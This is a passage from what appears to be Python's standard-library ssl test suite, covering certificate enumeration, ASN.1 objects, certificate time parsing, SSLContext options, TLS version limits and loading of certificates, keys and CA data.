self.assertTrue(ssl.enum_certificates("ROOT"))
self.assertRaises(TypeError, ssl.enum_certificates)
self.assertRaises(WindowsError, ssl.enum_certificates, "")
trust_oids = set()
for storename in ("CA", "ROOT"):
store = ssl.enum_certificates(storename)
self.assertIsInstance(store, list)
for element in store:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 3)
cert, enc, trust = element
self.assertIsInstance(cert, bytes)
self.assertIn(enc, {"x509_asn", "pkcs_7_asn"})
self.assertIsInstance(trust, (set, bool))
if isinstance(trust, set):
trust_oids.update(trust)
serverAuth = "1.3.6.1.5.5.7.3.1"
self.assertIn(serverAuth, trust_oids)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_crls(self):
self.assertTrue(ssl.enum_crls("CA"))
self.assertRaises(TypeError, ssl.enum_crls)
self.assertRaises(WindowsError, ssl.enum_crls, "")
crls = ssl.enum_crls("CA")
self.assertIsInstance(crls, list)
for element in crls:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 2)
self.assertIsInstance(element[0], bytes)
self.assertIn(element[1], {"x509_asn", "pkcs_7_asn"})
def test_asn1object(self):
expected = (129, 'serverAuth', 'TLS Web Server Authentication',
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertEqual(val, expected)
self.assertEqual(val.nid, 129)
self.assertEqual(val.shortname, 'serverAuth')
self.assertEqual(val.longname, 'TLS Web Server Authentication')
self.assertEqual(val.oid, '1.3.6.1.5.5.7.3.1')
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object, 'serverAuth')
val = ssl._ASN1Object.fromnid(129)
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object.fromnid, -1)
with self.assertRaisesRegex(ValueError, "unknown NID 100000"):
ssl._ASN1Object.fromnid(100000)
for i in range(1000):
try:
obj = ssl._ASN1Object.fromnid(i)
except ValueError:
pass
else:
self.assertIsInstance(obj.nid, int)
self.assertIsInstance(obj.shortname, str)
self.assertIsInstance(obj.longname, str)
self.assertIsInstance(obj.oid, (str, type(None)))
val = ssl._ASN1Object.fromname('TLS Web Server Authentication')
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertEqual(ssl._ASN1Object.fromname('serverAuth'), expected)
self.assertEqual(ssl._ASN1Object.fromname('1.3.6.1.5.5.7.3.1'),
expected)
with self.assertRaisesRegex(ValueError, "unknown object 'serverauth'"):
ssl._ASN1Object.fromname('serverauth')
def test_purpose_enum(self):
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertIsInstance(ssl.Purpose.SERVER_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.SERVER_AUTH, val)
self.assertEqual(ssl.Purpose.SERVER_AUTH.nid, 129)
self.assertEqual(ssl.Purpose.SERVER_AUTH.shortname, 'serverAuth')
self.assertEqual(ssl.Purpose.SERVER_AUTH.oid,
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.2')
self.assertIsInstance(ssl.Purpose.CLIENT_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.CLIENT_AUTH, val)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.nid, 130)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.shortname, 'clientAuth')
self.assertEqual(ssl.Purpose.CLIENT_AUTH.oid,
'1.3.6.1.5.5.7.3.2')
def test_unsupported_dtls(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
with self.assertRaises(NotImplementedError) as cx:
test_wrap_socket(s, cert_reqs=ssl.CERT_NONE)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertRaises(NotImplementedError) as cx:
ctx.wrap_socket(s)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
def cert_time_ok(self, timestring, timestamp):
self.assertEqual(ssl.cert_time_to_seconds(timestring), timestamp)
def cert_time_fail(self, timestring):
with self.assertRaises(ValueError):
ssl.cert_time_to_seconds(timestring)
@unittest.skipUnless(utc_offset(),
'local time needs to be different from UTC')
def test_cert_time_to_seconds_timezone(self):
# Issue #19940: ssl.cert_time_to_seconds() returns wrong
# results if local timezone is not UTC
self.cert_time_ok("May 9 00:00:00 2007 GMT", 1178668800.0)
self.cert_time_ok("Jan 5 09:34:43 2018 GMT", 1515144883.0)
def test_cert_time_to_seconds(self):
timestring = "Jan 5 09:34:43 2018 GMT"
ts = 1515144883.0
self.cert_time_ok(timestring, ts)
# accept keyword parameter, assert its name
self.assertEqual(ssl.cert_time_to_seconds(cert_time=timestring), ts)
# accept both %e and %d (space or zero generated by strftime)
self.cert_time_ok("Jan 05 09:34:43 2018 GMT", ts)
# case-insensitive
self.cert_time_ok("JaN 5 09:34:43 2018 GmT", ts)
self.cert_time_fail("Jan 5 09:34 2018 GMT") # no seconds
self.cert_time_fail("Jan 5 09:34:43 2018") # no GMT
self.cert_time_fail("Jan 5 09:34:43 2018 UTC") # not GMT timezone
self.cert_time_fail("Jan 35 09:34:43 2018 GMT") # invalid day
self.cert_time_fail("Jon 5 09:34:43 2018 GMT") # invalid month
self.cert_time_fail("Jan 5 24:00:00 2018 GMT") # invalid hour
self.cert_time_fail("Jan 5 09:60:43 2018 GMT") # invalid minute
newyear_ts = 1230768000.0
# leap seconds
self.cert_time_ok("Dec 31 23:59:60 2008 GMT", newyear_ts)
# same timestamp
self.cert_time_ok("Jan 1 00:00:00 2009 GMT", newyear_ts)
self.cert_time_ok("Jan 5 09:34:59 2018 GMT", 1515144899)
# allow 60th second (even if it is not a leap second)
self.cert_time_ok("Jan 5 09:34:60 2018 GMT", 1515144900)
# allow 2nd leap second for compatibility with time.strptime()
self.cert_time_ok("Jan 5 09:34:61 2018 GMT", 1515144901)
self.cert_time_fail("Jan 5 09:34:62 2018 GMT") # invalid seconds
# no special treatment for the special value:
# 99991231235959Z (rfc 5280)
self.cert_time_ok("Dec 31 23:59:59 9999 GMT", 253402300799.0)
@support.run_with_locale('LC_ALL', '')
def test_cert_time_to_seconds_locale(self):
# `cert_time_to_seconds()` should be locale independent
def local_february_name():
return time.strftime('%b', (1, 2, 3, 4, 5, 6, 0, 0, 0))
if local_february_name().lower() == 'feb':
self.skipTest("locale-specific month name needs to be "
"different from C locale")
# locale-independent
self.cert_time_ok("Feb 9 00:00:00 2007 GMT", 1170979200.0)
self.cert_time_fail(local_february_name() + " 9 00:00:00 2007 GMT")
def test_connect_ex_error(self):
server = socket.socket(socket.AF_INET)
self.addCleanup(server.close)
port = support.bind_port(server) # Reserve port but don't listen
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
rc = s.connect_ex((HOST, port))
# Issue #19919: Windows machines or VMs hosted on Windows
# machines sometimes return EWOULDBLOCK.
errors = (
errno.ECONNREFUSED, errno.EHOSTUNREACH, errno.ETIMEDOUT,
errno.EWOULDBLOCK,
)
self.assertIn(rc, errors)
class ContextTests(unittest.TestCase):
def test_constructor(self):
for protocol in PROTOCOLS:
ssl.SSLContext(protocol)
ctx = ssl.SSLContext()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertRaises(ValueError, ssl.SSLContext, -1)
self.assertRaises(ValueError, ssl.SSLContext, 42)
def test_protocol(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.protocol, proto)
def test_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_ciphers("ALL")
ctx.set_ciphers("DEFAULT")
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
ctx.set_ciphers("^$:,;?*'dorothyx")
@unittest.skipUnless(PY_SSL_DEFAULT_CIPHERS == 1,
"Test applies only to Python default ciphers")
def test_python_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ciphers = ctx.get_ciphers()
for suite in ciphers:
name = suite['name']
self.assertNotIn("PSK", name)
self.assertNotIn("SRP", name)
self.assertNotIn("MD5", name)
self.assertNotIn("RC4", name)
self.assertNotIn("3DES", name)
@unittest.skipIf(ssl.OPENSSL_VERSION_INFO < (1, 0, 2, 0, 0), 'OpenSSL too old')
def test_get_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_ciphers('AESGCM')
names = set(d['name'] for d in ctx.get_ciphers())
self.assertIn('AES256-GCM-SHA384', names)
self.assertIn('AES128-GCM-SHA256', names)
def test_options(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
# OP_ALL | OP_NO_SSLv2 | OP_NO_SSLv3 is the default value
default = (ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
# SSLContext also enables these by default
default |= (OP_NO_COMPRESSION | OP_CIPHER_SERVER_PREFERENCE |
OP_SINGLE_DH_USE | OP_SINGLE_ECDH_USE |
OP_ENABLE_MIDDLEBOX_COMPAT)
self.assertEqual(default, ctx.options)
ctx.options |= ssl.OP_NO_TLSv1
self.assertEqual(default | ssl.OP_NO_TLSv1, ctx.options)
if can_clear_options():
ctx.options = (ctx.options & ~ssl.OP_NO_TLSv1)
self.assertEqual(default, ctx.options)
ctx.options = 0
# Ubuntu has OP_NO_SSLv3 forced on by default
self.assertEqual(0, ctx.options & ~ssl.OP_NO_SSLv3)
else:
with self.assertRaises(ValueError):
ctx.options = 0
def test_verify_mode_protocol(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
# Default value
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
ctx.verify_mode = ssl.CERT_OPTIONAL
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
with self.assertRaises(TypeError):
ctx.verify_mode = None
with self.assertRaises(ValueError):
ctx.verify_mode = 42
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
def test_hostname_checks_common_name(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.hostname_checks_common_name)
if ssl.HAS_NEVER_CHECK_COMMON_NAME:
ctx.hostname_checks_common_name = True
self.assertTrue(ctx.hostname_checks_common_name)
ctx.hostname_checks_common_name = False
self.assertFalse(ctx.hostname_checks_common_name)
ctx.hostname_checks_common_name = True
self.assertTrue(ctx.hostname_checks_common_name)
else:
with self.assertRaises(AttributeError):
ctx.hostname_checks_common_name = True
@unittest.skipUnless(hasattr(ssl.SSLContext, 'minimum_version'),
"required OpenSSL 1.1.0g")
def test_min_max_version(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.MINIMUM_SUPPORTED
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.MAXIMUM_SUPPORTED
)
ctx.minimum_version = ssl.TLSVersion.TLSv1_1
ctx.maximum_version = ssl.TLSVersion.TLSv1_2
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.TLSv1_1
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.TLSv1_2
)
ctx.minimum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
ctx.maximum_version = ssl.TLSVersion.TLSv1
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.MINIMUM_SUPPORTED
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.TLSv1
)
ctx.maximum_version = ssl.TLSVersion.MAXIMUM_SUPPORTED
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.MAXIMUM_SUPPORTED
)
ctx.maximum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
self.assertIn(
ctx.maximum_version,
{ssl.TLSVersion.TLSv1, ssl.TLSVersion.SSLv3}
)
ctx.minimum_version = ssl.TLSVersion.MAXIMUM_SUPPORTED
self.assertIn(
ctx.minimum_version,
{ssl.TLSVersion.TLSv1_2, ssl.TLSVersion.TLSv1_3}
)
with self.assertRaises(ValueError):
ctx.minimum_version = 42
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1_1)
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.MINIMUM_SUPPORTED
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.MAXIMUM_SUPPORTED
)
with self.assertRaises(ValueError):
ctx.minimum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
with self.assertRaises(ValueError):
ctx.maximum_version = ssl.TLSVersion.TLSv1
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_verify_flags(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# default value
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT | tf)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_LEAF)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_CHAIN
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_CHAIN)
ctx.verify_flags = ssl.VERIFY_DEFAULT
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT)
# supports any value
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT
self.assertEqual(ctx.verify_flags,
ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT)
with self.assertRaises(TypeError):
ctx.verify_flags = None
def test_load_cert_chain(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# Combined key and cert in a single file
ctx.load_cert_chain(CERTFILE, keyfile=None)
ctx.load_cert_chain(CERTFILE, keyfile=CERTFILE)
self.assertRaises(TypeError, ctx.load_cert_chain, keyfile=CERTFILE)
with self.assertRaises(OSError) as cm:
ctx.load_cert_chain(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(BADCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(EMPTYCERT)
# Separate key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_cert_chain(ONLYCERT, ONLYKEY)
ctx.load_cert_chain(certfile=ONLYCERT, keyfile=ONLYKEY)
ctx.load_cert_chain(certfile=BYTES_ONLYCERT, keyfile=BYTES_ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(certfile=ONLYKEY, keyfile=ONLYCERT)
# Mismatching key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
with self.assertRaisesRegex(ssl.SSLError, "key values mismatch"):
ctx.load_cert_chain(CAFILE_CACERT, ONLYKEY)
# Password protected key and cert
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD.encode())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=bytearray(KEY_PASSWORD.encode()))
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD)
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD.encode())
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED,
bytearray(KEY_PASSWORD.encode()))
with self.assertRaisesRegex(TypeError, "should be a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=True)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password="badpass")
with self.assertRaisesRegex(ValueError, "cannot be longer"):
# openssl has a fixed limit on the password buffer.
# PEM_BUFSIZE is generally set to 1kb.
            # Pass a password longer than this.
ctx.load_cert_chain(CERTFILE_PROTECTED, password=b'a' * 102400)
# Password callback
def getpass_unicode():
return KEY_PASSWORD
def getpass_bytes():
return KEY_PASSWORD.encode()
def getpass_bytearray():
return bytearray(KEY_PASSWORD.encode())
def getpass_badpass():
return "badpass"
def getpass_huge():
return b'a' * (1024 * 1024)
def getpass_bad_type():
return 9
def getpass_exception():
raise Exception('getpass error')
class GetPassCallable:
def __call__(self):
return KEY_PASSWORD
def getpass(self):
return KEY_PASSWORD
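        # Plain functions, arbitrary callables and bound methods are all
        # accepted; the callback may return str, bytes or bytearray.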
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_unicode)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytes)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytearray)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=GetPassCallable())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=GetPassCallable().getpass)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_badpass)
with self.assertRaisesRegex(ValueError, "cannot be longer"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_huge)
with self.assertRaisesRegex(TypeError, "must return a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bad_type)
with self.assertRaisesRegex(Exception, "getpass error"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_exception)
# Make sure the password function isn't called if it isn't needed
ctx.load_cert_chain(CERTFILE, password=getpass_exception)
def test_load_verify_locations(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_verify_locations(CERTFILE)
ctx.load_verify_locations(cafile=CERTFILE, capath=None)
ctx.load_verify_locations(BYTES_CERTFILE)
ctx.load_verify_locations(cafile=BYTES_CERTFILE, capath=None)
self.assertRaises(TypeError, ctx.load_verify_locations)
self.assertRaises(TypeError, ctx.load_verify_locations, None, None, None)
with self.assertRaises(OSError) as cm:
ctx.load_verify_locations(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_verify_locations(BADCERT)
ctx.load_verify_locations(CERTFILE, CAPATH)
ctx.load_verify_locations(CERTFILE, capath=BYTES_CAPATH)
# Issue #10989: crash if the second argument type is invalid
self.assertRaises(TypeError, ctx.load_verify_locations, None, True)
def test_load_verify_cadata(self):
# test cadata
with open(CAFILE_CACERT) as f:
cacert_pem = f.read()
cacert_der = ssl.PEM_cert_to_DER_cert(cacert_pem)
with open(CAFILE_NEURONIO) as f:
neuronio_pem = f.read()
neuronio_der = ssl.PEM_cert_to_DER_cert(neuronio_pem)
# test PEM
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 0)
ctx.load_verify_locations(cadata=cacert_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 1)
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = "\n".join((cacert_pem, neuronio_pem))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# with junk around the certs
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = ["head", cacert_pem, "other", neuronio_pem, "again",
neuronio_pem, "tail"]
ctx.load_verify_locations(cadata="\n".join(combined))
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# test DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(cadata=cacert_der)
ctx.load_verify_locations(cadata=neuronio_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=cacert_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = b"".join((cacert_der, neuronio_der))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# error cases
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertRaises(TypeError, ctx.load_verify_locations, cadata=object)
with self.assertRaisesRegex(ssl.SSLError, "no start line"):
ctx.load_verify_locations(cadata="broken")
with self.assertRaisesRegex(ssl.SSLError, "not enough data"):
ctx.load_verify_locations(cadata=b"broken")
def test_load_dh_params(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_dh_params(DHFILE)
if os.name != 'nt':
ctx.load_dh_params(BYTES_DHFILE)
self.assertRaises(TypeError, ctx.load_dh_params)
self.assertRaises(TypeError, ctx.load_dh_params, None)
with self.assertRaises(FileNotFoundError) as cm:
ctx.load_dh_params(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
def test_session_stats(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.session_stats(), {
'number': 0,
'connect': 0,
'connect_good': 0,
'connect_renegotiate': 0,
'accept': 0,
'accept_good': 0,
'accept_renegotiate': 0,
'hits': 0,
'misses': 0,
'timeouts': 0,
'cache_full': 0,
})
def test_set_default_verify_paths(self):
# There's not much we can do to test that it acts as expected,
# so just check it doesn't crash or raise an exception.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_default_verify_paths()
@unittest.skipUnless(ssl.HAS_ECDH, "ECDH disabled on this OpenSSL build")
def test_set_ecdh_curve(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.set_ecdh_curve("prime256v1")
ctx.set_ecdh_curve(b"prime256v1")
self.assertRaises(TypeError, ctx.set_ecdh_curve)
self.assertRaises(TypeError, ctx.set_ecdh_curve, None)
self.assertRaises(ValueError, ctx.set_ecdh_curve, "foo")
self.assertRaises(ValueError, ctx.set_ecdh_curve, b"foo")
@needs_sni
def test_sni_callback(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# set_servername_callback expects a callable, or None
self.assertRaises(TypeError, ctx.set_servername_callback)
self.assertRaises(TypeError, ctx.set_servername_callback, 4)
self.assertRaises(TypeError, ctx.set_servername_callback, "")
self.assertRaises(TypeError, ctx.set_servername_callback, ctx)
def dummycallback(sock, servername, ctx):
pass
ctx.set_servername_callback(None)
ctx.set_servername_callback(dummycallback)
@needs_sni
def test_sni_callback_refcycle(self):
# Reference cycles through the servername callback are detected
# and cleared.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
def dummycallback(sock, servername, ctx, cycle=ctx):
pass
ctx.set_servername_callback(dummycallback)
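        # The default argument cycle=ctx creates the reference cycle
        # ctx -> callback -> ctx that the GC is expected to clear.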
wr = weakref.ref(ctx)
del ctx, dummycallback
gc.collect()
self.assertIs(wr(), None)
def test_cert_store_stats(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_cert_chain(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 1})
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 1, 'crl': 0, 'x509': 2})
def test_get_ca_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.get_ca_certs(), [])
# CERTFILE is not flagged as X509v3 Basic Constraints: CA:TRUE
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.get_ca_certs(), [])
# but CAFILE_CACERT is a CA cert
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.get_ca_certs(),
[{'issuer': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'notAfter': asn1time('Mar 29 12:29:49 2033 GMT'),
'notBefore': asn1time('Mar 30 12:29:49 2003 GMT'),
'serialNumber': '00',
'crlDistributionPoints': ('https://www.cacert.org/revoke.crl',),
'subject': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'version': 3}])
with open(CAFILE_CACERT) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
self.assertEqual(ctx.get_ca_certs(True), [der])
def test_load_default_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs(ssl.Purpose.SERVER_AUTH)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs(ssl.Purpose.CLIENT_AUTH)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertRaises(TypeError, ctx.load_default_certs, None)
self.assertRaises(TypeError, ctx.load_default_certs, 'SERVER_AUTH')
@unittest.skipIf(sys.platform == "win32", "not-Windows specific")
@unittest.skipIf(IS_LIBRESSL, "LibreSSL doesn't support env vars")
def test_load_default_certs_env(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
self.assertEqual(ctx.cert_store_stats(), {"crl": 0, "x509": 1, "x509_ca": 0})
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
@unittest.skipIf(hasattr(sys, "gettotalrefcount"), "Debug build does not share environment between CRTs")
def test_load_default_certs_env_windows(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs()
stats = ctx.cert_store_stats()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
stats["x509"] += 1
self.assertEqual(ctx.cert_store_stats(), stats)
def _assert_context_options(self, ctx):
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
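        # The OP_* names checked below are assumed to resolve to 0 on
        # OpenSSL builds that lack them, so each check is guarded.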
if OP_NO_COMPRESSION != 0:
self.assertEqual(ctx.options & OP_NO_COMPRESSION,
OP_NO_COMPRESSION)
if OP_SINGLE_DH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_DH_USE,
OP_SINGLE_DH_USE)
if OP_SINGLE_ECDH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_ECDH_USE,
OP_SINGLE_ECDH_USE)
if OP_CIPHER_SERVER_PREFERENCE != 0:
self.assertEqual(ctx.options & OP_CIPHER_SERVER_PREFERENCE,
OP_CIPHER_SERVER_PREFERENCE)
def test_create_default_context(self):
ctx = ssl.create_default_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
with open(SIGNING_CA) as f:
cadata = f.read()
ctx = ssl.create_default_context(cafile=SIGNING_CA, capath=CAPATH,
cadata=cadata)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self._assert_context_options(ctx)
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test__create_stdlib_context(self):
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1,
cert_reqs=ssl.CERT_REQUIRED,
check_hostname=True)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
